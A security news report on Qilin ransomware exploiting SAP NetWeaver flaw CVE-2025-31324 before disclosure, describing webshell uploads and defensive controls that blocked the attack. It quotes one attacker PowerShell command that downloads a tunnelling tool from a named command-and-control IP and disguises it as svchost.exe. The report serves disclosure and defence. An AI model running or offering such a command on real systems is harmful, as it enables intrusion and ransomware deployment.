DevOps
sysops

A critical vulnerability in SAP enterprise software, CVE-2025-31324, has been exploited by the Russian Ransomware-as-a-Service (RaaS) group Qilin nearly three weeks before its public disclosure, according to a recent investigation.

The vulnerability, which received the highest possible CVSS score of 10.0, affects SAP NetWeaver Visual Composer, a component widely deployed in enterprise environments globally.

The flaw resides in the /developmentserver/metadatauploader endpoint, which fails to properly enforce authentication, allowing unauthenticated attackers to upload arbitrary files to servers.

The severity of this vulnerability stems from its ease of exploitation and the widespread deployment of affected SAP components in critical business infrastructure.

With no authentication required and exposure via standard HTTP/HTTPS protocols, the vulnerability creates an easily accessible attack surface. Once exploited, attackers can achieve remote code execution privileges, potentially leading to complete system compromise and subsequent ransomware deployment.

OP Innovate analysts identified the pre-disclosure exploitation during an incident response engagement for a major global enterprise.

Their forensic investigation revealed that the attack occurred weeks before the vulnerability was publicly announced, demonstrating sophisticated intelligence-gathering capabilities by the threat actor.

While recent reports have suggested Chinese-linked APTs were behind early exploitations, OP Innovate’s analysis tied the activity directly to Qilin’s known infrastructure.

“What started as a routine post-disclosure investigation quickly evolved into a rare glimpse of zero-day exploitation in the wild,” noted the incident response team.

The discovery highlights an increasingly concerning trend where financially motivated cybercriminal groups like Qilin are leveraging zero-day vulnerabilities traditionally associated with nation-state actors.

The exploitation of CVE-2025-31324 before its disclosure demonstrates the rapidly shrinking window between vulnerability discovery and active exploitation.

Enterprise organizations using SAP systems face heightened risk as criminal groups adopt more sophisticated tactics previously reserved for advanced persistent threats.

Exploitation Chain and WebShell Deployment

The attack leveraged a misconfigured load balancer that exposed internal SAP services to the internet. Using the vulnerable /developmentserver/metadatauploader endpoint, Qilin operators uploaded multiple JSP-based webshells to the SAP IRJ directory.

These webshells, with randomized names such as randoml2.jsp, xxkmszdm.jsp, and gpfmddkh.jsp, were automatically compiled by the SAP system into executable class files, providing the attackers with remote code execution capabilities.

After establishing initial access, the attackers used the webshells to execute PowerShell commands attempting to download a SOCKS5 tunneling tool called rs64c.exe from a known Qilin command and control server at 184.174.96.74.

The command used was:-

powershell.exe /c invoke-webrequest http://184.174.96.74/rs64c.exe -OutFile c:programdatasvchost.exe

The payload was intended to establish communication with additional Qilin infrastructure at 180.131.145.73, matching indicators previously identified in an official threat intelligence bulletin (IOC_QILIN Ransomware v1.3) released by Indonesia’s National Cyber and Crypto Agency.

Fortunately, defensive controls prevented successful exploitation. The organization’s firewall blocked outbound command and control traffic, while endpoint detection and response (EDR) systems quarantined the downloaded payloads before execution.

The attackers attempted to clean up their artifacts by issuing Remove-Item commands, but the files had already been isolated by security controls.

Qilin Attack Chain (Source – OP Innovate)

The investigation highlights the critical importance of defense-in-depth strategies when protecting enterprise middleware like SAP, particularly as ransomware groups increasingly target these systems using sophisticated exploitation techniques previously associated with nation-state actors.

Equip your SOC team with deep threat analysis for faster response -> Get Extra 𝗦𝗮𝗻𝗱𝗯𝗼𝘅 𝗹𝗶𝗰𝗲𝗻𝘀𝗲𝘀 for Free

Related Posts

IBM has released a critical security update for its Cognos Analytics software, addressing two severe vulnerabilities: CVE-2023-42017 and CVE-2024-51466. These vulnerabilities could allow…

A critical vulnerability affecting over 100,000 WordPress websites has been discovered in the SureTriggers WordPress plugin, potentially allowing attackers to…

A critical vulnerability in F5 BIG-IP, a popular network traffic management and security solution tracked as CVE-2024-45844, allows authenticated attackers…